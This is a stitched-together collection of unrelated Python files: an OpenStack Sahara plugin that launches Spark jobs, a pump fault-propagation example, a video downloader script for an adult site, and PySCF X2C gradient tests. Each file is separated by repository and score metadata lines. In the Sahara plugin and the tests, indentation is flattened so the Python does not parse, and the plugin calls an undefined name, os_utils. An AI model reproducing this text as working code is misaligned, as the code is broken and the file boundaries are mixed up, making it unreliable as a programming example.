# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import datetime
import os
import subprocess
import time
import threading
import uuid
import math
from broker import exceptions as ex
from broker.utils.openstack import connector as os_connector
from broker.plugins import base
from broker.service import api
from broker.utils import hdfs
from broker.utils.framework import monitor
from broker.utils.framework import optimizer
from broker.utils import remote
from broker.utils.framework import controller
from broker.utils import spark
from broker.utils.logger import Log, configure_logging
from saharaclient.api.base import APIException as SaharaAPIException
from broker.utils.ids import ID_Generator
from broker.plugins.base import GenericApplicationExecutor
plugin_log = Log("Sahara_Plugin", "logs/sahara_plugin.log")
application_time_log = Log("Application_Time", "logs/application_time.log")
instances_log = Log("Instances", "logs/instances.log")
configure_logging()
class OpenStackSparkApplicationExecutor(GenericApplicationExecutor):
def __init__(self, app_id):
self.application_state = "None"
self.state_lock = threading.RLock()
self.application_time = -1
self.start_time = -1
self.app_id = app_id
self._verify_existing_log_paths(app_id)
self._clean_log_files(app_id)
self.running_log = Log("Running_Application_%s" % app_id,
"logs/apps/%s/execution" % app_id)
self.stdout = Log("stdout_%s" % app_id, "logs/apps/%s/stdout" % app_id)
self.stderr = Log("stderr_%s" % app_id, "logs/apps/%s/stderr" % app_id)
def get_application_state(self):
with self.state_lock:
state = self.application_state
return state
def update_application_state(self, state):
with self.state_lock:
self.application_state = state
def get_application_execution_time(self):
return self.application_time
def get_application_start_time(self):
return self.start_time
def start_application(self, data, spark_applications_ids, app_id):
try:
self.update_application_state("Running")
# Broker Parameters
cluster_id = None
user = api.user
            password = api.password
project_id = api.project_id
auth_ip = api.auth_ip
domain = api.domain
public_key = api.public_key
key_path = api.key_path
log_path = api.log_path
container = api.container
hosts = api.hosts
remote_hdfs = api.remote_hdfs
swift_logdir = api.swift_logdir
number_of_attempts = api.number_of_attempts
dummy_opportunistic = api.dummy_opportunistic
# User Request Parameters
net_id = data['net_id']
master_ng = data['master_ng']
slave_ng = data['slave_ng']
op_slave_ng = data['opportunistic_slave_ng']
opportunism = str(data['opportunistic'])
plugin = data['openstack_plugin']
percentage = int(data['percentage'])
job_type = data['job_type']
version = data['version']
args = data['args']
main_class = data['main_class']
dependencies = data['dependencies']
job_template_name = data['job_template_name']
job_binary_name = data['job_binary_name']
job_binary_url = data['job_binary_url']
image_id = data['image_id']
monitor_plugin = data['monitor_plugin']
expected_time = data['expected_time']
collect_period = data['collect_period']
number_of_jobs = data['number_of_jobs']
image_id = data['image_id']
starting_cap = data['starting_cap']
# Optimizer Parameters
app_name = data['app_name']
days = 0
if app_name.lower() == 'bulma':
if 'days' in data.keys():
days = data['days']
else:
self._log("""%s | 'days' parameter missing"""
% (time.strftime("%H:%M:%S")))
raise ex.ConfigurationError()
# Openstack Components
connector = os_connector.OpenStackConnector(plugin_log)
sahara = connector.get_sahara_client(user, password, project_id,
auth_ip, domain)
swift = connector.get_swift_client(user, password, project_id,
auth_ip, domain)
nova = connector.get_nova_client(user, password, project_id,
auth_ip, domain)
# Optimizer gets the vcpu size of flavor
cores_per_slave = connector.get_vcpus_by_nodegroup(nova,
sahara,
slave_ng)
cores, vms = optimizer.get_info(api.optimizer_url,
expected_time,
app_name,
days)
if cores <= 0:
if 'cluster_size' in data.keys():
req_cluster_size = data['cluster_size']
else:
self._log("""%s | 'cluster_size' parameter missing"""
% (time.strftime("%H:%M:%S")))
raise ex.ConfigurationError()
else:
req_cluster_size = int(math.ceil(cores/float(cores_per_slave)))
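                # e.g. 10 requested cores on a slave flavor with 4 vcpus gives
                # req_cluster_size = ceil(10 / 4.0) = 3 worker instances.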
            # Check Opportunism
if opportunism == "True":
self._log("""%s | Checking if opportunistic instances
are available""" % (time.strftime("%H:%M:%S")))
pred_cluster_size = optimizer.get_cluster_size(
api.optimizer_url, hosts, percentage, dummy_opportunistic)
else:
pred_cluster_size = req_cluster_size
if pred_cluster_size > req_cluster_size:
cluster_size = pred_cluster_size
else:
cluster_size = req_cluster_size
self._log("%s | Cluster size: %s" %
(time.strftime("%H:%M:%S"), str(cluster_size)))
self._log("%s | Creating cluster..."
% (time.strftime("%H:%M:%S")))
cluster_id = self._create_cluster(sahara, connector,
req_cluster_size,
pred_cluster_size,
public_key, net_id, image_id,
plugin, version, master_ng,
slave_ng, op_slave_ng)
self._log("%s | Cluster id: %s" % (time.strftime("%H:%M:%S"),
cluster_id))
swift_path = self._is_swift_path(args)
if cluster_id:
master = connector.get_master_instance(
sahara, cluster_id)['internal_ip']
self._log("%s | Master is %s" %
(time.strftime("%H:%M:%S"), master))
workers = connector.get_worker_instances(sahara, cluster_id)
workers_id = []
for worker in workers:
workers_id.append(worker['instance_id'])
self._log("%s | Configuring controller" %
(time.strftime("%H:%M:%S")))
controller.setup_environment(api.controller_url, workers_id,
starting_cap, data)
if swift_path:
job_status = self._swift_spark_execution(
master, key_path, sahara, connector, job_binary_name,
job_binary_url, user, password, job_template_name,
job_type, plugin, cluster_size, args, main_class,
cluster_id, spark_applications_ids, workers_id, app_id,
expected_time, monitor_plugin, collect_period,
number_of_jobs, log_path, swift, container, data,
number_of_attempts)
else:
job_status = self._hdfs_spark_execution(
master, remote_hdfs, key_path, args, job_binary_url,
main_class, dependencies, spark_applications_ids,
expected_time, monitor_plugin, collect_period,
number_of_jobs, workers_id, data, connector, swift,
swift_logdir, container, number_of_attempts)
else:
# FIXME: exception type
self.update_application_state("Error")
raise ex.ClusterNotCreatedException()
# Delete cluster
self._log("%s | Delete cluster: %s" %
(time.strftime("%H:%M:%S"), cluster_id))
connector.delete_cluster(sahara, cluster_id)
self._log("%s | Finished application execution" %
(time.strftime("%H:%M:%S")))
return job_status
except KeyError as ke:
self._log("%s | Parameter missing in submission: %s, "
"please check the config file" %
(time.strftime("%H:%M:%S"), str(ke)))
self._log("%s | Finished application execution with error" %
(time.strftime("%H:%M:%S")))
self.update_application_state("Error")
except ex.ConfigurationError as ce:
self._log("%s | Finished application execution with error" %
(time.strftime("%H:%M:%S")))
self.update_application_state("Error")
except SaharaAPIException as se:
self._log("%s | There is not enough resource to create a cluster" %
(time.strftime("%H:%M:%S")))
self._log("%s | Finished application execution with error" %
(time.strftime("%H:%M:%S")))
self.update_application_state("Error")
except Exception as e:
if cluster_id is not None:
self._log("%s | Delete cluster: %s" %
(time.strftime("%H:%M:%S"), cluster_id))
connector.delete_cluster(sahara, cluster_id)
self._log("%s | Unknown error, please report to administrators "
"of WP3 infrastructure" % (time.strftime("%H:%M:%S")))
self._log("%s | Finished application execution with error" %
(time.strftime("%H:%M:%S")))
self.update_application_state("Error")
def get_application_time(self):
return self.application_time
def _get_job_binary_id(self, sahara, connector, job_binary_name,
job_binary_url, user, password):
extra = dict(user=user, password=password)
job_binary_id = connector.get_job_binary(sahara, job_binary_url)
if not job_binary_id:
job_binary_id = connector.create_job_binary(sahara,
job_binary_name,
job_binary_url, extra)
return job_binary_id
def _get_job_template_id(self, sahara, connector, mains, job_template_name,
job_type):
job_template_id = connector.get_job_template(sahara, mains)
if not job_template_id:
job_template_id = connector.create_job_template(sahara,
job_template_name,
job_type, mains)
return job_template_id
def _wait_on_job_finish(self, sahara, connector, job_exec_id,
spark_app_id):
completed = failed = False
start_time = datetime.datetime.now()
self.start_time = time.mktime(start_time.timetuple())
while not (completed or failed):
job_status = connector.get_job_status(sahara, job_exec_id)
self._log("%s | Sahara current job status: %s" %
(time.strftime("%H:%M:%S"), job_status))
if job_status == 'RUNNING':
time.sleep(2)
current_time = datetime.datetime.now()
current_job_time = (current_time - start_time).total_seconds()
if current_job_time > 3600:
self._log("%s | Job execution killed due to inactivity" %
time.strftime("%H:%M:%S"))
job_status = 'TIMEOUT'
completed = connector.is_job_completed(job_status)
failed = connector.is_job_failed(job_status)
end_time = datetime.datetime.now()
total_time = end_time - start_time
application_time_log.log("%s|%.0f|%.0f" % (
spark_app_id,
float(time.mktime(start_time.timetuple())),
float(total_time.total_seconds())))
self.application_time = total_time.total_seconds()
self._log("%s | Sahara job took %s seconds to execute" %
(time.strftime("%H:%M:%S"), str(total_time.total_seconds())))
return job_status
def _create_cluster(self, sahara, connector, req_cluster_size,
pred_cluster_size, public_key, net_id, image_id,
plugin, version, master_ng, slave_ng, op_slave_ng):
self._log('Creating cluster')
try:
cluster_id = connector.create_cluster(sahara, req_cluster_size,
pred_cluster_size,
public_key, net_id,
image_id, plugin,
version, master_ng,
slave_ng, op_slave_ng)
except SaharaAPIException:
raise SaharaAPIException('Could not create clusters')
return cluster_id
def _is_swift_path(self, args):
for arg in args:
if arg.startswith('hdfs://') or arg.startswith('swift://'):
if arg.startswith('swift://'):
return True
else:
return False
def _swift_spark_execution(self, master, key_path, sahara, connector,
job_binary_name, job_binary_url, user, password,
job_template_name, job_type, plugin,
cluster_size, args, main_class, cluster_id,
spark_applications_ids, workers_id, app_id,
expected_time, monitor_plugin, collect_period,
number_of_jobs, log_path, swift,
container, data, number_of_attempts):
# Preparing job
job_binary_id = self._get_job_binary_id(sahara, connector,
job_binary_name,
job_binary_url, user,
password)
mains = [job_binary_id]
job_template_id = self._get_job_template_id(sahara, connector,
mains,
job_template_name,
job_type)
self._log("%s | Starting job..." % (time.strftime("%H:%M:%S")))
# Running job
configs = os_utils.get_job_config(connector, plugin,
cluster_size, user, password,
args, main_class)
job = connector.create_job_execution(sahara, job_template_id,
cluster_id,
configs=configs)
self._log("%s | Created job" % (time.strftime("%H:%M:%S")))
spark_app_id = spark.get_running_app(master,
spark_applications_ids,
number_of_attempts)
spark_applications_ids.append(spark_app_id)
self._log("%s | Spark app id" % (time.strftime("%H:%M:%S")))
job_exec_id = job.id
for worker_id in workers_id:
instances_log.log("%s|%s" % (app_id, worker_id))
job_status = connector.get_job_status(sahara, job_exec_id)
self._log("%s | Sahara job status: %s" %
(time.strftime("%H:%M:%S"), job_status))
info_plugin = {"spark_submisson_url": "http://" + master,
"expected_time": expected_time,
"number_of_jobs": number_of_jobs}
self._log("%s | Starting monitor" % (time.strftime("%H:%M:%S")))
monitor.start_monitor(api.monitor_url, spark_app_id,
monitor_plugin, info_plugin, collect_period)
self._log("%s | Starting controller" % (time.strftime("%H:%M:%S")))
controller.start_controller(api.controller_url, spark_app_id,
workers_id, data)
job_status = self._wait_on_job_finish(sahara, connector,
job_exec_id, app_id)
self._log("%s | Stopping monitor" % (time.strftime("%H:%M:%S")))
monitor.stop_monitor(api.monitor_url, spark_app_id)
self._log("%s | Stopping controller" % (time.strftime("%H:%M:%S")))
controller.stop_controller(api.controller_url, spark_app_id)
spark_applications_ids.remove(spark_app_id)
self._log("Finished application execution")
if connector.is_job_completed(job_status):
self.update_application_state("OK")
if connector.is_job_failed(job_status):
self.update_application_state("Error")
return job_status
def _hdfs_spark_execution(self, master, remote_hdfs, key_path, args,
job_bin_url, main_class, dependencies,
spark_applications_ids, expected_time,
monitor_plugin, collect_period, number_of_jobs,
workers_id, data, connector, swift,
swift_logdir, container, number_of_attempts):
job_exec_id = str(uuid.uuid4())[0:7]
self._log("%s | Job execution ID: %s" %
(time.strftime("%H:%M:%S"), job_exec_id))
# Defining params
local_path = '/tmp/spark-jobs/' + job_exec_id + '/'
remote_path = 'ubuntu@' + master + ':' + local_path
job_input_paths, job_output_path, job_params = (
hdfs.get_job_params(key_path, remote_hdfs, args))
job_binary_path = hdfs.get_path(job_bin_url)
# Create temporary job directories
self._log("%s | Create temporary job directories" %
(time.strftime("%H:%M:%S")))
self._mkdir(local_path)
# Create cluster directories
self._log("%s | Creating cluster directories" %
(time.strftime("%H:%M:%S")))
remote.execute_command(master, key_path,
'mkdir -p %s' % local_path)
# Get job binary from hdfs
self._log("%s | Get job binary from hdfs" %
(time.strftime("%H:%M:%S")))
remote.copy_from_hdfs(master, key_path, remote_hdfs,
job_binary_path, local_path)
# Enabling event log on cluster
self._log("%s | Enabling event log on cluster" %
(time.strftime("%H:%M:%S")))
self._enable_event_log(master, key_path, local_path)
# Submit job
self._log("%s | Starting job" %
(time.strftime("%H:%M:%S")))
local_binary_file = (local_path + remote.list_directory(key_path,
master,
local_path))
spark_job = self._submit_job(master, key_path, main_class,
dependencies, local_binary_file, args)
spark_app_id = spark.get_running_app(master,
spark_applications_ids,
number_of_attempts)
if spark_app_id is None:
self._log("%s | Error on submission of application, "
"please check the config file" %
(time.strftime("%H:%M:%S")))
(output, err) = spark_job.communicate()
self.stdout.log(output)
self.stderr.log(err)
raise ex.ConfigurationError()
spark_applications_ids.append(spark_app_id)
info_plugin = {"spark_submisson_url": "http://" + master,
"expected_time": expected_time,
"number_of_jobs": number_of_jobs}
self._log("%s | Starting monitor" % (time.strftime("%H:%M:%S")))
monitor.start_monitor(api.monitor_url, spark_app_id,
monitor_plugin, info_plugin, collect_period)
self._log("%s | Starting controller" % (time.strftime("%H:%M:%S")))
controller.start_controller(api.controller_url, spark_app_id,
workers_id, data)
(output, err) = spark_job.communicate()
self._log("%s | Stopping monitor" % (time.strftime("%H:%M:%S")))
monitor.stop_monitor(api.monitor_url, spark_app_id)
self._log("%s | Stopping controller" % (time.strftime("%H:%M:%S")))
controller.stop_controller(api.controller_url, spark_app_id)
self.stdout.log(output)
self.stderr.log(err)
self._log("%s | Copy log from cluster" % (time.strftime("%H:%M:%S")))
event_log_path = local_path + 'eventlog/'
self._mkdir(event_log_path)
remote_event_log_path = 'ubuntu@%s:%s%s' % (master, local_path,
spark_app_id)
remote.copy(key_path, remote_event_log_path, event_log_path)
self._log("%s | Upload log to Swift" % (time.strftime("%H:%M:%S")))
connector.upload_directory(swift, event_log_path,
swift_logdir, container)
spark_applications_ids.remove(spark_app_id)
self.update_application_state("OK")
return 'OK'
def _submit_job(self, remote_instance, key_path, main_class,
dependencies, job_binary_file, args):
args_line = ''
for arg in args:
args_line += arg + ' '
spark_submit = ('/opt/spark/bin/spark-submit '
'--packages %(dependencies)s '
'--class %(main_class)s '
'--master spark://%(master)s:7077 '
'%(job_binary_file)s %(args)s ' %
{'dependencies': dependencies,
'main_class': main_class,
'master': remote_instance,
'job_binary_file': 'file://'+job_binary_file,
'args': args_line})
if main_class == '':
spark_submit = spark_submit.replace('--class', '')
if dependencies == '':
spark_submit = spark_submit.replace('--packages', '')
self._log("%s | spark-submit: %s" %
(time.strftime("%H:%M:%S"), spark_submit))
job = remote.execute_command_popen(remote_instance,
key_path,
spark_submit)
return job
def _enable_event_log(self, master, key_path, path):
enable_event_log_command = ("echo -e 'spark.executor.extraClassPath "
"/usr/lib/hadoop-mapreduce/hadoop-openstack.jar\n"
"spark.eventLog.enabled true\n"
"spark.eventLog.dir "
"file://%(path)s' > "
"/opt/spark/conf/spark-defaults.conf" % {'path': path})
remote.execute_command(master, key_path, enable_event_log_command)
def _log(self, string):
plugin_log.log(string)
self.running_log.log(string)
def _verify_existing_log_paths(self, app_id):
if not os.path.exists('logs'):
os.mkdir('logs')
elif not os.path.exists('logs/apps'):
os.mkdir('logs/apps')
if not os.path.exists('logs/apps/%s' % app_id):
os.mkdir('logs/apps/%s' % app_id)
def _clean_log_files(self, app_id):
running_log_file = open("logs/apps/%s/execution" % app_id, "w").close()
stdout_file = open("logs/apps/%s/stdout" % app_id, "w").close()
stderr_file = open("logs/apps/%s/stderr" % app_id, "w").close()
def _mkdir(self, path):
subprocess.call('mkdir -p %s' % path, shell=True)
class SaharaProvider(base.PluginInterface):
def __init__(self):
self.spark_applications_ids = []
self.id_generator = ID_Generator()
def get_title(self):
return 'OpenStack Sahara'
def get_description(self):
return 'Plugin that allows utilization of Sahara to run jobs'
def to_dict(self):
return {
'name': self.name,
'title': self.get_title(),
'description': self.get_description(),
}
def execute(self, data):
app_id = str(uuid.uuid4())[0:7]
executor = OpenStackSparkApplicationExecutor(app_id)
handling_thread = threading.Thread(target=executor.start_application,
args=(data,
self.spark_applications_ids,
app_id))
handling_thread.start()
return (app_id, executor)
| 1.6875 | 2 |
pump_script.py | hulsed/FFERMAT | 1 | 12786786 | <reponame>hulsed/FFERMAT<gh_stars>1-10
# -*- coding: utf-8 -*-
"""
File name: pump_script.py
Author: <NAME>
Created: October 2019
Description: A simple example of I/O using faultprop.py and the pump model in ex_pump.py
"""
#Using the model that was set up, we can now perform a few different operations
#First, import the fault propagation library as well as the model
import faultprop as fp
import ex_pump as mdl
#Before seeing how faults propagate, it's useful to see how the model performs
#in the nominal state to check that the model has been defined correctly.
# Some things worth checking:
# -are all functions on the graph?
# -are the functions connected with the correct flows?
# -do any faults occur in the nominal state?
# -do all the flow states proceed as desired over time?
endresults, resgraph, flowhist, ghist=fp.runnominal(mdl, track={'Wat_1','Wat_2', 'EE_1', 'Sig_1'})
fp.showgraph(resgraph)
fp.plotflowhist(flowhist, 'Nominal')
#We might further query the faults to see what happens to the various states
endresults, resgraph, flowhist, ghist=fp.proponefault(mdl, 'Move Water', 'short', time=10, track={'Wat_1','Wat_2', 'EE_1', 'Sig_1'})
fp.showgraph(resgraph)
fp.plotflowhist(flowhist, 'short', time=10)
t=fp.printresult('Move Water', 'short', 10, endresults)
print(t)
#in addition to these visualizations, we can also look at the final results
#to see which specific faults were caused, as well as the flow states
#print(endresults)
#we can also look at other faults
endresults, resgraph, flowhist, ghist=fp.proponefault(mdl, 'Export Water', 'block', time=10, track={'Wat_1','Wat_2', 'EE_1', 'Sig_1'})
fp.showgraph(resgraph)
fp.plotflowhist(flowhist, 'blockage', time=10)
t=fp.printresult('Export Water', 'block', 10, endresults)
print(t)
#you can save to a csv this with:
#t.write('tab.ecsv', overwrite=True)
#finally, to get the results of all of the scenarios, we can go through the list
#note that this will propagate faults based on the times vector put in the model,
# e.g. times=[0,3,15,55] will propagate the faults at the beginning, end, and at
# t=3 and t=15
resultsdict, resultstab=fp.proplist(mdl)
print(resultstab)
# resultstab.write('tab.ecsv', overwrite=True) | 2.46875 | 2 |
main.py | Kiritow/PHDownloader | 1 | 12786787 | from mtdownloader import MTDownloader
from mtdownloader import readable as readableSize
from phuburl import resolver as PageResolver
import requests
import json
import time
def readableTime(s):
s=int(s)
if(s<60):
return '{}s'.format(s)
elif(s<3600):
return '{}m{}s'.format(s//60,s%60)
else:
return '{}h{}m{}s'.format(s//3600,(s%3600)//60,s%60)
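# Illustrative results (derived from the branches above): readableTime(75) -> '1m15s',
# readableTime(3661) -> '1h1m1s'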
def readConfig():
try:
with open('config.json') as f:
config=json.loads(f.read())
return config
except FileNotFoundError:
print('Unable to read config.')
return None
def setupConfig():
print('Welcome to PHDownloader config setup.')
config={}
str=input('Use proxy? (Y/n): ')
if(str=='' or str.lower()=='y'):
config["useProxy"]=True
config["proxy"]={}
str=input('http proxy (http://127.0.0.1:1080): ')
if(str!=''):
config["proxy"]["http"]=str
else:
config["proxy"]["http"]='http://127.0.0.1:1080'
str=input('https proxy (https://127.0.0.1:1080): ')
if(str!=''):
config["proxy"]["https"]=str
else:
config["proxy"]["https"]='https://127.0.0.1:1080'
else:
config["useProxy"]=False
config["proxy"]={"http":"http://127.0.0.1:1080","https":"https://127.0.0.1:1080"}
str=input("Use timeout? (None): ")
if(str=='' or str.lower()=='none'):
config["timeout"]=None
else:
config["timeout"]=int(str)
str=input("Use debug? (y/N): ")
if(str=='' or str.lower()=='n'):
config["debug"]=False
else:
config["debug"]=True
str=input("Allow overwrite? (y/N): ")
if(str=='' or str.lower()=='n'):
config["overwrite"]=False
else:
config["overwrite"]=True
with open('config.json','w') as f:
f.write(json.dumps(config,indent=4))
print('Config saved to `config.json`')
return config
if __name__ == "__main__":
config=readConfig()
if(config is None):
config=setupConfig()
if(config["useProxy"]):
theProxy=config["proxy"]
else:
theProxy=None
while True:
try:
url=input('Please input URL: ')
except EOFError:
break
try:
print('[BEGIN] {}'.format(url))
res=requests.get(url,proxies=theProxy)
info=PageResolver(res.text)
print(info)
downloader=MTDownloader(info['url'],filename=info['name'],overwrite=config["overwrite"],timeout=config["timeout"],proxy=theProxy,debug=config["debug"])
time_before=time.time()
downloader.start()
downloader.wait()
time_diff=time.time()-time_before
print('[DONE] {} ({} in {} at {})'.format(info["name"],
readableSize(downloader.length),readableTime(time_diff),
'{}/s'.format(readableSize(downloader.length/time_diff))))
except Exception as e:
print('[Error] {}'.format(e))
| 2.53125 | 3 |
pyscf/x2c/test/test_x2c_grad.py | robert-anderson/pyscf | 501 | 12786788 | #!/usr/bin/env python
# Copyright 2014-2018 The PySCF Developers. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from functools import reduce
import unittest
import numpy
import scipy.linalg
from pyscf import lib
from pyscf import gto
from pyscf.x2c import sfx2c1e
from pyscf.x2c import sfx2c1e_grad
def _sqrt0(a):
w, v = scipy.linalg.eigh(a)
return numpy.dot(v*numpy.sqrt(w), v.conj().T)
def _invsqrt0(a):
w, v = scipy.linalg.eigh(a)
return numpy.dot(v/numpy.sqrt(w), v.conj().T)
def _sqrt1(a0, a1):
'''Solving first order of x^2 = a'''
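    # Writing X = X0 + X1 with X0 = sqrt(A0), the first-order condition is
    # X0 @ X1 + X1 @ X0 = A1.  In the eigenbasis of A0, with w = sqrt(eigenvalues)
    # as computed below, this gives (X1)_ij = (A1)_ij / (w_i + w_j).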
w, v = scipy.linalg.eigh(a0)
w = numpy.sqrt(w)
a1 = reduce(numpy.dot, (v.conj().T, a1, v))
x1 = a1 / (w[:,None] + w)
x1 = reduce(numpy.dot, (v, x1, v.conj().T))
return x1
def _invsqrt1(a0, a1):
'''Solving first order of x^2 = a^{-1}'''
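    # Here X = A^{-1/2}; differentiating X @ X = A^{-1} gives
    # X0 @ X1 + X1 @ X0 = -A0^{-1} @ A1 @ A0^{-1}.  With w = eigenvalues(A0)^(-1/2)
    # as computed below, the right-hand side in the eigenbasis is
    # -w_i**2 * (A1)_ij * w_j**2, divided elementwise by (w_i + w_j).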
w, v = scipy.linalg.eigh(a0)
w = 1./numpy.sqrt(w)
a1 = -reduce(numpy.dot, (v.conj().T, a1, v))
x1 = numpy.einsum('i,ij,j->ij', w**2, a1, w**2) / (w[:,None] + w)
x1 = reduce(numpy.dot, (v, x1, v.conj().T))
return x1
def get_R(mol):
s0 = mol.intor('int1e_ovlp')
t0 = mol.intor('int1e_kin')
s0sqrt = _sqrt0(s0)
s0invsqrt = _invsqrt0(s0)
x0 = get_x0(mol)
c = lib.param.LIGHT_SPEED
stild = s0 + reduce(numpy.dot, (x0.T, t0*(.5/c**2), x0))
R = _invsqrt0(reduce(numpy.dot, (s0invsqrt, stild, s0invsqrt)))
R = reduce(numpy.dot, (s0invsqrt, R, s0sqrt))
return R
def get_r1(mol, atm_id, pos):
# See JCP 135 084114, Eq (34)
c = lib.param.LIGHT_SPEED
aoslices = mol.aoslice_by_atom()
ish0, ish1, p0, p1 = aoslices[atm_id]
s0 = mol.intor('int1e_ovlp')
t0 = mol.intor('int1e_kin')
s1all = mol.intor('int1e_ipovlp', comp=3)
t1all = mol.intor('int1e_ipkin', comp=3)
s1 = numpy.zeros_like(s0)
t1 = numpy.zeros_like(t0)
s1[p0:p1,:] =-s1all[pos][p0:p1]
s1[:,p0:p1] -= s1all[pos][p0:p1].T
t1[p0:p1,:] =-t1all[pos][p0:p1]
t1[:,p0:p1] -= t1all[pos][p0:p1].T
x0 = get_x0(mol)
x1 = get_x1(mol, atm_id)[pos]
sa0 = s0 + reduce(numpy.dot, (x0.T, t0*(.5/c**2), x0))
sa1 = s1 + reduce(numpy.dot, (x0.T, t1*(.5/c**2), x0))
sa1+= reduce(numpy.dot, (x1.T, t0*(.5/c**2), x0))
sa1+= reduce(numpy.dot, (x0.T, t0*(.5/c**2), x1))
s0_sqrt = _sqrt0(s0)
s0_invsqrt = _invsqrt0(s0)
s1_sqrt = _sqrt1(s0, s1)
s1_invsqrt = _invsqrt1(s0, s1)
R0_part = reduce(numpy.dot, (s0_invsqrt, sa0, s0_invsqrt))
R1_part = (reduce(numpy.dot, (s0_invsqrt, sa1, s0_invsqrt)) +
reduce(numpy.dot, (s1_invsqrt, sa0, s0_invsqrt)) +
reduce(numpy.dot, (s0_invsqrt, sa0, s1_invsqrt)))
R1 = reduce(numpy.dot, (s0_invsqrt, _invsqrt1(R0_part, R1_part), s0_sqrt))
R1 += reduce(numpy.dot, (s1_invsqrt, _invsqrt0(R0_part), s0_sqrt))
R1 += reduce(numpy.dot, (s0_invsqrt, _invsqrt0(R0_part), s1_sqrt))
return R1
def get_h0_s0(mol):
s = mol.intor_symmetric('int1e_ovlp')
t = mol.intor_symmetric('int1e_kin')
v = mol.intor_symmetric('int1e_nuc')
w = mol.intor_symmetric('int1e_pnucp')
nao = s.shape[0]
n2 = nao * 2
h = numpy.zeros((n2,n2), dtype=v.dtype)
m = numpy.zeros((n2,n2), dtype=v.dtype)
c = lib.param.LIGHT_SPEED
h[:nao,:nao] = v
h[:nao,nao:] = t
h[nao:,:nao] = t
h[nao:,nao:] = w * (.25/c**2) - t
m[:nao,:nao] = s
m[nao:,nao:] = t * (.5/c**2)
return h, m
def get_h1_s1(mol, ia):
aoslices = mol.aoslice_by_atom()
ish0, ish1, p0, p1 = aoslices[0]
nao = mol.nao_nr()
s1 = mol.intor('int1e_ipovlp', comp=3)
t1 = mol.intor('int1e_ipkin', comp=3)
v1 = mol.intor('int1e_ipnuc', comp=3)
w1 = mol.intor('int1e_ipspnucsp', comp=12).reshape(3,4,nao,nao)[:,3]
with mol.with_rinv_origin(mol.atom_coord(ia)):
rinv1 = -8*mol.intor('int1e_iprinv', comp=3)
prinvp1 = -8*mol.intor('int1e_ipsprinvsp', comp=12).reshape(3,4,nao,nao)[:,3]
n2 = nao * 2
h = numpy.zeros((3,n2,n2), dtype=v1.dtype)
m = numpy.zeros((3,n2,n2), dtype=v1.dtype)
rinv1[:,p0:p1,:] -= v1[:,p0:p1]
rinv1 = rinv1 + rinv1.transpose(0,2,1).conj()
prinvp1[:,p0:p1,:] -= w1[:,p0:p1]
prinvp1 = prinvp1 + prinvp1.transpose(0,2,1).conj()
s1ao = numpy.zeros_like(s1)
t1ao = numpy.zeros_like(t1)
s1ao[:,p0:p1,:] = -s1[:,p0:p1]
s1ao[:,:,p0:p1]+= -s1[:,p0:p1].transpose(0,2,1)
t1ao[:,p0:p1,:] = -t1[:,p0:p1]
t1ao[:,:,p0:p1]+= -t1[:,p0:p1].transpose(0,2,1)
c = lib.param.LIGHT_SPEED
h[:,:nao,:nao] = rinv1
h[:,:nao,nao:] = t1ao
h[:,nao:,:nao] = t1ao
h[:,nao:,nao:] = prinvp1 * (.25/c**2) - t1ao
m[:,:nao,:nao] = s1ao
m[:,nao:,nao:] = t1ao * (.5/c**2)
return h, m
def get_x0(mol):
c = lib.param.LIGHT_SPEED
h0, s0 = get_h0_s0(mol)
e, c = scipy.linalg.eigh(h0, s0)
nao = mol.nao_nr()
cl = c[:nao,nao:]
cs = c[nao:,nao:]
x0 = scipy.linalg.solve(cl.T, cs.T).T
return x0
def get_x1(mol, ia):
h0, s0 = get_h0_s0(mol)
h1, s1 = get_h1_s1(mol, ia)
e0, c0 = scipy.linalg.eigh(h0, s0)
nao = mol.nao_nr()
cl0 = c0[:nao,nao:]
cs0 = c0[nao:,nao:]
x0 = scipy.linalg.solve(cl0.T, cs0.T).T
h1 = numpy.einsum('pi,xpq,qj->xij', c0.conj(), h1, c0[:,nao:])
s1 = numpy.einsum('pi,xpq,qj->xij', c0.conj(), s1, c0[:,nao:])
epi = e0[:,None] - e0[nao:]
degen_mask = abs(epi) < 1e-7
epi[degen_mask] = 1e200
c1 = (h1 - s1 * e0[nao:]) / -epi
c1[:,degen_mask] = -.5 * s1[:,degen_mask]
c1 = numpy.einsum('pq,xqi->xpi', c0, c1)
cl1 = c1[:,:nao]
cs1 = c1[:,nao:]
x1 = [scipy.linalg.solve(cl0.T, (cs1[i] - x0.dot(cl1[i])).T).T
for i in range(3)]
return numpy.asarray(x1)
mol1 = gto.M(
verbose = 0,
atom = [["O" , (0. , 0. , 0.0001)],
[1 , (0. , -0.757 , 0.587)],
[1 , (0. , 0.757 , 0.587)]],
basis = '3-21g',
)
mol2 = gto.M(
verbose = 0,
atom = [["O" , (0. , 0. ,-0.0001)],
[1 , (0. , -0.757 , 0.587)],
[1 , (0. , 0.757 , 0.587)]],
basis = '3-21g',
)
mol = gto.M(
verbose = 0,
atom = [["O" , (0. , 0. , 0. )],
[1 , (0. , -0.757 , 0.587)],
[1 , (0. , 0.757 , 0.587)]],
basis = '3-21g',
)
class KnownValues(unittest.TestCase):
def test_x1(self):
with lib.light_speed(10) as c:
x_1 = get_x0(mol1)
x_2 = get_x0(mol2)
x1_ref = (x_1 - x_2) / 0.0002 * lib.param.BOHR
x1t = get_x1(mol, 0)
self.assertAlmostEqual(abs(x1t[2]-x1_ref).max(), 0, 7)
x0 = get_x0(mol)
h0, s0 = get_h0_s0(mol)
e0, c0 = scipy.linalg.eigh(h0, s0)
get_h1_etc = sfx2c1e_grad._gen_first_order_quantities(mol, e0, c0, x0)
x1 = get_h1_etc(0)[4]
self.assertAlmostEqual(abs(x1-x1t).max(), 0, 9)
def test_R1(self):
with lib.light_speed(10) as c:
R_1 = get_R(mol1)
R_2 = get_R(mol2)
R1_ref = (R_1 - R_2) / 0.0002 * lib.param.BOHR
R1t = get_r1(mol, 0, 2)
self.assertAlmostEqual(abs(R1t-R1_ref).max(), 0, 7)
x0 = get_x0(mol)
